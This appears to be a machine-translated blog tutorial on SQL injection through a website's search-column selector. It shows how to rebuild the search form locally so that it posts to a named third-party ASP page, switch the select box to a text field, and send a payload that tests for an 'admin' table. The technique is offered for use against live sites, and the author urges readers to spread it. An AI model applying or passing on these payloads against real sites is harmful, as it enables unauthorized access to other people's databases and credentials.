Tips for search matching Column Injection

When we inject a url, we may try the get, post, and cookies methods.
If it fails, you can still use the search box for injection. Have you noticed some matching columns on the search box? We can also use the matching column for injection!

Generally, the form in the search matching column is as follows:
<Form action = "sb-team.asp" method = "post" name = ""> // action is the data submission address. method is the submission method.
Keyword: <input type = "text" name = ""> // input tag. The content of the keyword is the following keyword.
Range: <select name = ""> // The content here is the following select (select)
<Option value = ""> content </option>
<Option value = ""> title </option>
</Select>
<Input type = "submit" value = "Search"> // submit
</From>

Then his query statement conjecture may be:

Select data from tables where select (select) like "% keyword %" order by id desc

When we inject the matching column, the key statement is:

Where select like "% keyword %" order by id desc

After learning about the above, we can locally construct an html submission page:
<Html>
<Head>
<Title> submitted by str1ven for local injection </title>
</Head>
<Form action = "http://www.bkjia.com/sb-team.asp" method = "post" name = "">
Search Keyword: <input type = "text" name = "">
Range: <input type = "text" name = ""> // here, select is changed to text to facilitate statement writing.
<Input type = "submit" value = "Search"> // submit
</Form>
</Html>

Then we write the injection statement in the range column:

Exists (select count (*) from admin)> 0 and sb

Enter sb in the search keyword bar.

Then I will make up the statement:

Where exists (select count (*) from admin)> 0 and sb like % sb % (as long as the statement is valid, sb can be changed to another)

Because sb must like sb, the statement is true.

In this way, we inject data through the matching column.

The article provides only one idea. Please spread it ~~~~~~ {: 4_114 :}

 

From: Str1ven's Blog